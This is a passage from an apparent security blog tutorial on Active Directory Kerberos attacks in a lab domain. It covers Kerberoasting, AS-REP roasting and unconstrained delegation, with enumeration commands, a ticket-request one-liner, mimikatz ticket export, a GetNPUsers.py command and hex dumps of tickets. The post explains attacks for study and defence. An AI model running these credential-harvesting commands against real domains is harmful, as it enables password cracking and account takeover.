1082w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>The current user, win10user has no privs at the MSSQL DBS at all, and actually, we don&#8217;t need that as I mentioned Kerberos is all about authentication, so even low privs valid user will be able to issue a TGS for any service.<br \/>\nThat&#8217;s one way to do it, but it&#8217;s not practical, so let&#8217;s check out a better one using only native windows stuff.<br \/>\nListing the SPNs related to that machine will result in<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">C:\\Users\\win10user&gt;setspn -F -Q *\/win2012*\r\nChecking forest DC=jnkfo,DC=lab\r\nCN=WIN2012,CN=Computers,DC=jnkfo,DC=lab\r\n        WSMAN\/win2012\r\n        WSMAN\/win2012.jnkfo.lab\r\n        RestrictedKrbHost\/WIN2012\r\n        HOST\/WIN2012\r\n        RestrictedKrbHost\/win2012.jnkfo.lab\r\n        HOST\/win2012.jnkfo.lab\r\nCN=mssqlserver,CN=Users,DC=jnkfo,DC=lab\r\n        MSSQLSvc\/win2012.jnkfo.lab:1433\r\nCN=dummy1,CN=Users,DC=jnkfo,DC=lab\r\n        mssqlsvc\/win2012\r\n        xxxxx\/win2012\r\n\r\nExisting SPN found!\r\n\r\nC:\\Users\\win10user&gt;<\/pre>\n<p>As an attacker you will need to focus on the CN=users part, these are the crackable ones as their passwords are chooses by humans unlike the randomly generated machine keys.<br \/>\nIssue ticket for mssqlserver&#8217;s SPN using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Add-Type -AssemblyName System.IdentityModel;New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken \u2013ArgumentList \"MSSQLSvc\/win2012.jnkfo.lab:1433\"<\/pre>\n<p>&nbsp;<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-641\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png\" alt=\"\" width=\"1024\" height=\"535\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-641\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png\" alt=\"\" width=\"1024\" height=\"535\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-1024x535.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-300x157.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3-768x401.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k3.png 1385w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>So dumping the current ticket using <strong>kerberos::list \/export<\/strong> will result in<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-642\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png\" alt=\"\" width=\"874\" height=\"435\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-642\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png\" alt=\"\" width=\"874\" height=\"435\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4.png 874w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4-300x149.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k4-768x382.png 768w\" sizes=\"auto, (max-width: 874px) 100vw, 874px\" \/><\/noscript><\/p>\n<p>knowing that the ticket is encrypted using service key, you&#8217;re ready to go and start offline cracking, for sake of illustration am using john<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-643\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png\" alt=\"\" width=\"1024\" height=\"205\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-643\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png\" alt=\"\" width=\"1024\" height=\"205\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1024x205.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-300x60.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-768x154.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5-1536x308.png 1536w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/k5.png 1769w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Cool, again this isn&#8217;t the best approach for Kerbroasting (when it come to simplicity), invoke-kerbroast would do everything in a blink of an eye, but I just needed to show you how the process is done.<br \/>\nRefer to the following <a href=\"https:\/\/blog.redforce.io\/oh-my-kerberos-do-not-get-kerberoasted\/\">blog post<\/a> for more information and references regarding Kerbroasting.<\/p>\n<h2><span class=\"ez-toc-section\" id=\"AS-REP_Roasting\"><\/span>AS-REP Roasting<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Before Kerberos 5, you wouldn&#8217;t see something such as KRB5KDC_ERR_PREAUTH_REQUIRED, as the preauthentication step wasn&#8217;t required.<br \/>\nThings were a little bit different.<br \/>\nIn kerberos5 this is how the 1st few steps of authentication are done<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-647\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-647\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-1024x494.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-300x145.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1-768x370.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast1.jpg 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>The preauthentication step is required, means the client is the part who&#8217;s using the user&#8217;s hash to encrypt the timestamp.<br \/>\nThis is the default option in Kerberos 5<\/p>\n<p>But in kerberos4, and also in Kerberos 5 after modifying some options, this is what&#8217;s going on.<br \/>\n<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-648\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-648\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg\" alt=\"\" width=\"1024\" height=\"494\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-1024x494.jpg 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-300x145.jpg 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2-768x370.jpg 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/roast2.jpg 1182w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<p>Once the client ask for authentication and provides username, the KDC retrieve that user&#8217;s hash and use it to encrypt a message, then send this message back to the client!!!!!<br \/>\nNow the client ca simply start an offline brute-force attack against that encrypted part.<br \/>\nThis happens in Kerberos 5 (modern AD) when the following option is enabled<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-649\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png\" alt=\"\" width=\"735\" height=\"610\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-649\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png\" alt=\"\" width=\"735\" height=\"610\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35.png 735w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/35-300x249.png 300w\" sizes=\"auto, (max-width: 735px) 100vw, 735px\" \/><\/noscript><\/p>\n<p>The &#8220;Do not require Kerberos preauthentication&#8221; option isn&#8217;t enabled by default, but once it&#8217;s ticked, this is what&#8217;s happening when you login using that user<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-650\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png\" alt=\"\" width=\"842\" height=\"369\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-650\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png\" alt=\"\" width=\"842\" height=\"369\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36.png 842w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36-300x131.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/36-768x337.png 768w\" sizes=\"auto, (max-width: 842px) 100vw, 842px\" \/><\/noscript><\/p>\n<p>No preauthentication requests, the KDC just encrypted the timestamp, TGS name, TGS session key, and lifetime using user&#8217;s hash.<br \/>\nNow the attacker can simply do an offline brute-force and retrieve the user&#8217;s plaintext password.<\/p>\n<p>It&#8217;s easy to get the users with &#8220;Do not require Kerberos preauthentication&#8221; enabled using<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">get-aduser -filter * -properties DoesNotRequirePreAuth | where {$_.DoesNotRequirePreAuth -eq \"True\"} | select Name\r\n<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-651\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png\" alt=\"\" width=\"849\" height=\"324\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-651\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png\" alt=\"\" width=\"849\" height=\"324\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37.png 849w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37-300x114.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/37-768x293.png 768w\" sizes=\"auto, (max-width: 849px) 100vw, 849px\" \/><\/noscript><\/p>\n<p>Attacking these users is easy using Rubeus or using getnpusers.py<br \/>\ngetnpusers.py can use a wordlist of usernames and try to obtain a crackable hashes for these users with the &#8220;Do not require Kerberos preauthentication&#8221; option enabled.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">python GetNPUsers.py jnkfo.lab\/ -usersfile userslist.txt -format john -outputfile roasted.txt -no-pass -dc-ip 192.168.18.2<\/pre>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-652\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png\" alt=\"\" width=\"1024\" height=\"276\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-large wp-image-652\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png\" alt=\"\" width=\"1024\" height=\"276\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-1024x276.png 1024w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-300x81.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38-768x207.png 768w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/38.png 1321w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/noscript><\/p>\n<h2><span class=\"ez-toc-section\" id=\"Unconstrained_Delegation\"><\/span>Unconstrained Delegation<span class=\"ez-toc-section-end\"><\/span><\/h2>\n<p>Delegation is the act of <span style=\"color: #ff0000;\">Service<\/span> impersonating <span style=\"color: #0000ff;\">User<\/span> to access another <span style=\"color: #ff0000;\">Service<\/span><\/p>\n<p>Imagine a web application is used to manage shared folders for employees,<br \/>\nThe employee logs in and he can view, edit, or delete his files which are found in another server.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-655\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png\" alt=\"\" width=\"924\" height=\"545\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-655\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png\" alt=\"\" width=\"924\" height=\"545\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40.png 924w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40-300x177.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/40-768x453.png 768w\" sizes=\"auto, (max-width: 924px) 100vw, 924px\" \/><\/noscript><\/p>\n<p>So, Employee 1 login to the Web server using the HTTP service ticket,<br \/>\nNow the <span style=\"color: #ff0000;\">Web application<\/span> needs to access the <span style=\"color: #ff0000;\">File sharing<\/span> server <span style=\"color: #000000;\">as <span style=\"color: #0000ff;\">Employee 1<\/span><\/span> to receive his files!<br \/>\nTo do so, it needs to get a TGS for the File sharing service, But with Employee1&#8217;s username inside!<br \/>\nThat&#8217;s where delegation plays a part.<\/p>\n<p>When enabled, delegation allows employee 1 to <span style=\"color: #ff0000;\">send his own TGT<\/span> to the webserver, so the web service can use it to obtain a TGS on behave of employee 1 to access the file sharing service.<br \/>\nThe same goes for employees 2, 3, 4 &#8230;ETC<\/p>\n<p>Knowing so, once you compromise a machine with delegation option enabled<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-656\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png\" alt=\"\" width=\"478\" height=\"561\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-656\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png\" alt=\"\" width=\"478\" height=\"561\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42.png 478w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/42-256x300.png 256w\" sizes=\"auto, (max-width: 478px) 100vw, 478px\" \/><\/noscript><\/p>\n<p>You can dump the TGTs of the users who used any service on that machine, then abuse these TGTs to act on behave of these users.<br \/>\ngetting employee1&#8217;s TGT will allow you to issue a TGS for any service on behave of employee1, and so accessing the services he has access to.<\/p>\n<p>The TGT transferring part was a little bit confusing for me, many resources declared that it&#8217;s &#8220;inside&#8221; the TGS, <span style=\"color: #ff0000;\">which I found out it&#8217;s not correct at all<\/span>.<br \/>\nMany others just stating that the TGT and the TGS are being passed to the server, which isn&#8217;t enough info!!<br \/>\nso I will explain it as well, maybe someone is looking for it the same as I did.<\/p>\n<p>This is how it looks like when connecting to a machine configured for unconstrained delegation<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-664\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png\" alt=\"\" width=\"1001\" height=\"274\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-664\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png\" alt=\"\" width=\"1001\" height=\"274\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47.png 1001w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47-300x82.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/47-768x210.png 768w\" sizes=\"auto, (max-width: 1001px) 100vw, 1001px\" \/><\/noscript><\/p>\n<p>You will notice 2 TGS-REQ,<br \/>\nThe 1st 1 is for the service we&#8217;re trying to access (CIFS)<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-665\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png\" alt=\"\" width=\"908\" height=\"485\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-665\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png\" alt=\"\" width=\"908\" height=\"485\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48.png 908w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48-300x160.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/48-768x410.png 768w\" sizes=\"auto, (max-width: 908px) 100vw, 908px\" \/><\/noscript><\/p>\n<p>The other one is for the krbtgt<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-666\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png\" alt=\"\" width=\"733\" height=\"464\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-666\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png\" alt=\"\" width=\"733\" height=\"464\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49.png 733w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/49-300x190.png 300w\" sizes=\"auto, (max-width: 733px) 100vw, 733px\" \/><\/noscript><\/p>\n<p>This is the one that the server will be able to use, it&#8217;s for getting services tickets on behalf of the user.<\/p>\n<p>The client will take the krbtgt TGS and embed it inside the authenticator message.<br \/>\nI assume you remember how the authenticator is encrypted and decrypted.<br \/>\nIt&#8217;s encrypted using the service session key, which can be found inside the TGS, which can only be decrypted using the service account&#8217;s key.<br \/>\nSo the client will send the 1st TGS-REP, which is the service ticket<br \/>\nAnd the Authenticator message which has the 2nd TGS-REP (TGT) inside.<br \/>\nThe service will decrypt the TGS, obtain service session key, then use the service session key to decrypt the authenticator message and obtain the user&#8217;s TGT [krb_cred].<br \/>\nIt caches it then for later use.<br \/>\nThis can be summarized in the following pic, which takes place after the 1st TGS-REP received<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-667\" src=\"data:image\/gif;base64,R0lGODlhAQABAIAAAAAAAP\/\/\/yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" data-src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png\" alt=\"\" width=\"898\" height=\"428\" \/><noscript><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-667\" src=\"http:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png\" alt=\"\" width=\"898\" height=\"428\" srcset=\"https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50.png 898w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50-300x143.png 300w, https:\/\/blog.redforce.io\/wp-content\/uploads\/2020\/04\/50-768x366.png 768w\" sizes=\"auto, (max-width: 898px) 100vw, 898px\" \/><\/noscript><\/p>\n<p>2nd TGS-REP message (TGT) is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">005344b65048b86449f7fe08544054595c6e2d5fcf532495162c1880ad69431e836b33eee70f6511d63fd424334ba4b72e9577672ed7830bd51cb33b3b33a9769b730f97c4f8cc48b6f52776814b0c50eb942bc5a44e87aaa12ee8bbe5d2cdda9aec5d2bc03ed75622ccd02c798feac7583dcf1990d5b58e9618789f01fab6cce5c1f94488162195b71cedb48101b2cf7e033ad27bd73710c803d22992d22bc946fb7166aa88c6e99a10b2846f1d19c7337c02ceb64a2ff91915176d55ec22778ce34c8fa68de349fc0aac47d36efc918f627de45996bced3ab4c888176687b66aa8777f8c293c6ab45af6adabeb92b1462d98d0f23d198cfa197e5411b936df647097bb9240953c6189e655ff668806fa0c8f1d796196386e9a2f60d503efda2d59298677ad912def4a2b13d4b825d5b6236b08bb6b8d93a59daae20b63754963121c80ca3df4ddee47541a5b47ffb4b00c7a112982d5daa89d1741100d7e57bd9b3ef6752a4fde0f2f86f64adbf7bee30a96304e1b975410f100e7d2cd7900c4e3436980b74e377fcea3bbcd5ef710fa7d81c95ef5708c686014e5b9f39b5632962bc3f187ab9b5d8a88cb89b3cb2b44673d3e8dcdecaaf0bbd93c8bd4af0ff8f58ba63fe525dfe163f4e244c575e7e8b69186571f8c0c60643ab438a8254e6051d1ffdb50d535f6543f9be9100cbfe0f5bb44ec2bc4a564fcdfc46a3555bda3032ae59b3c58f1dbeb20a8d33fd8cc05388a9c2de37b93a75d696c35bab01cb704374ebc2728a94510bab6f4c5270c27a10131a074738b26c6fc77eb43e78add1532478e5315f9509120d0e02229a803dc5388b05e6ef8f979c5fb1a2905be7471599fcffee5f37c252dd806e699b55fcb72bed8982dcbce49a129f41714e3e3971491218e447c2011fd3e24c426699858d5fa610471da03af8a6092764c4618f2868bb883dfb5979da505a31c0c129d0766eb73404200b646e396bd4b1d5c6de23898b828b578e63461708a24f426af7d43ccfec1295e783b7b1073001177a741131ca98fcc2af1f385178c5eed34a37098c8fea590ee63b0491a0b95131a39b069066c8c32250e41ded94b8d60ff923c7e691e23f614c1ed23cc4ab4b0d53f8ac0ffb53d1b2ae37e9e1501d7bb72dbcb028d6007fb37e0142037094b43fa79a45d965aa3a053c98a3e42c037d0a5ab41487344b189c05b1b1e1dc3b8e11a482127d97b659b92382344c5ff5fbebb492146519947a140242f25c730c5130b09ea28f18eaf99b3a847c877e522c3f62d06d22ea837195bc1a470c12144af9ffb820c3266c4ef381827eb76b0c6c5<\/pre>\n<p>Authenticator message after decryption is<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">Sequence:\r\n field-0=5\r\n field-1=JNKFO.LAB\r\n field-2=Sequence:\r\n  field-0=1\r\n  field-1=SequenceOf:\r\n   win10user\r\n\r\n field-3=Sequence:\r\n  field-0=32771\r\n  field-1=0x10000000000000000000000000000000000000002300000001001a057682051630820512a003020105a103020116a282040730820403618203ff308203fba003020105a10b1b094a4e4b464f2e4c4142a21e301ca003020102a11530131b066b72627467741b094a4e4b464f2e4c4142a38203c5308203c1a003020112a103020103a28203b3048203af005344b65048b86449f7fe08544054595c6e2d5fcf532495162c1880ad69431e836b33eee70f6511d63fd424334ba4b72e9577672ed7830bd51cb33b3b33a9769b730f97c4f8cc48b6f52776814b0c50eb942bc5a44e87aaa12ee8bbe5d2cdda9aec5d2bc03ed75622ccd02c798feac7583dcf1990d5b58e9618789f01fab6cce5c1f94488162195b71cedb48101b2cf7e033ad27bd73710c803d22992d22bc946fb7166aa88c6e99a10b2846f1d19c7337c02ceb64a2ff91915176d55ec22778ce34c8fa68de349fc0aac47d36efc918f627de45996bced3ab4c888176687b66aa8777f8c293c6ab45af6adabeb92b1462d98d0f23d198cfa197e5411b936df647097bb9240953c6189e655ff668806fa0c8f1d796196386e9a2f60d503efda2d59298677ad912def4a2b13d4b825d5b6236b08bb6b8d93a59daae20b63754963121c80ca3df4ddee47541a5b47ffb4b00c7a112982d5daa89d1741100d7e57bd9b3ef6752a4fde0f2f86f64adbf7bee30a96304e1b975410f100e7d2cd7900c4e3436980b74e377fcea3bbcd5ef710fa7d81c95ef5708c686014e5b9f39b5632962bc3f187ab9b5d8a88cb89b3cb2b44673d3e8dcdecaaf0bbd93c8bd4af0ff8f58ba63fe525dfe163f4e244c575e7e8b69186571f8c0c60643ab438a8254e6051d1ffdb50d535f6543f9be9100cbfe0f5bb44ec2bc4a564fcdfc46a3555bda3032ae59b3c58f1dbeb20a8d33fd8cc05388a9c2de37b93a75d696c35bab01cb704374ebc2728a94510bab6f4c5270c27a10131a074738b26c6fc77eb43e78add1532478e5315f9509120d0e02229a803dc5388b05e6ef8f979c5fb1a2905be7471599fcffee5f37c252dd806e699b55fcb72bed8982dcbce49a129f41714e3e3971491218e447c2011fd3e24c426699858d5fa610471da03af8a6092764c4618f2868bb883dfb5979da505a31c0c129d0766eb73404200b646e396bd4b1d5c6de23898b828b578e63461708a24f426af7d43ccfec1295e783b7b1073001177a741131ca98fcc2af1f385178c5eed34a37098c8fea590ee63b0491a0b95131a39b069066c8c32250e41ded94b8d60ff923c7e691e23f614c1ed23cc4ab4b0d53f8ac0ffb53d1b2ae37e9e1501d7bb72dbcb028d6007fb37e0142037094b43fa79a45d965aa3a053c98a3e42c037d0a5ab41487344b189c05b1b1e1dc3b8e11a482127d97b659b92382344c5ff5fbebb492146519947a140242f25c730c5130b09ea28f18eaf99b3a847c877e522c3f62d06d22ea837195bc1a470c12144af9ffb820c3266c4ef381827eb76b0c6c5a381fa3081f7a003020112a281ef0481ec6556782acbf0b4f78002c3af3a7ecf35e7a18aad30a52603763b8cf600f5eb6fc830afb3e6c61f694158b5a5209059b61a9a16f4c8dcc1191a3b188ac766c0d613af144454d0682063ceb3f4ab07b0cdee1354d37f3b6ff88fee70321c6d57ded89c6efc6f92af5cac42525730636b253d0b8a357183dbfc09d0d8ca75da7ecdaee3574c50bc31b54a2c0b3139e92d5c973cd26a8fb7581d479d74cbee5f552bb6c7a791bdf8ef575646d16af7f3134282d5edbc0272c53da2887af0dce6ba2935d237a9a26eef4df3720ffa7154970a0de4aafa16a5b8c43e33303ac0c52eb78c05d0c0f8b11546c9f672dc\r\n\r\n field-4=468\r\n field-5=20200501014535Z\r\n field-6=Sequence:\r\n  field-0=18\r\n  field-1=0x52852d5447e40ee95df24c67e8400cf79f1146df958d29d3205fe8689a55325c\r\n\r\n field-7=900366966\r\n field-8=SequenceOf:\r\n  Sequence:\r\n   field-0=1\r\n   field-1=0x3081b9303fa0040202008da137043530333031a003020100a12a0428010000000020000047a9dfdb7f739b0e5720ff9a17c3534c94c937ef0b55329c007b8ce1204dfac3301aa0040202008ea1120410a01978ab0a0200002b9d850300000000300ea0040202008fa106040400400000304aa00402020090a142044063006900660073002f00770069006e0032003000310032002e006a006e006b0066006f002e006c006100620040004a004e004b0046004f002e004c0041004200\r\n<\/pre>\n<p>You will find that the KRB_CRED is embedded inside<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"null\">The authenticator checksum field SHALL have the following format:\r\n\r\n       Octet        Name      Description\r\n      -----------------------------------------------------------------\r\n       0..3         Lgth    Number of octets in Bnd field;  Represented\r\n                            in little-endian order;  Currently contains\r\n                            hex value 10 00 00 00 (16).\r\n       4..19        Bnd     Channel binding information, as described in\r\n                            section 4.1.1.2.\r\n       20..23       Flags   Four-octet context-establishment flags in\r\n                            little-endian order as described in section\r\n                            4.1.1.1.\r\n       24..25       DlgOpt  The delegation option identifier (=1) in\r\n                            little-endian order [optional].  This field\r\n                            and the next two fields are present if and\r\n                            only if GSS_C_DELEG_FLAG is set as described\r\n                            in section 4.1.1.1.\r\n       26..27       Dlgth   The length of the Deleg field in\r\n                            little-endian order [optional].\r\n       28..(n-1)    Deleg   A KRB_CRED message (n = Dlgth + 28)\r\n                            [optional].\r\n       n..last      Exts    Extensions [optional].\r\n<\/pre>\n<p><a href=\"https:\/\/tools.ietf.org\/html\/rfc4121\">Reference<\/a><\/p>\n<p>So assuming I compromised the machine win2012.jnkfo.lab, you will be able to dump all the TGTs Not just for the users who accessed the web service, but for any user who accessed any 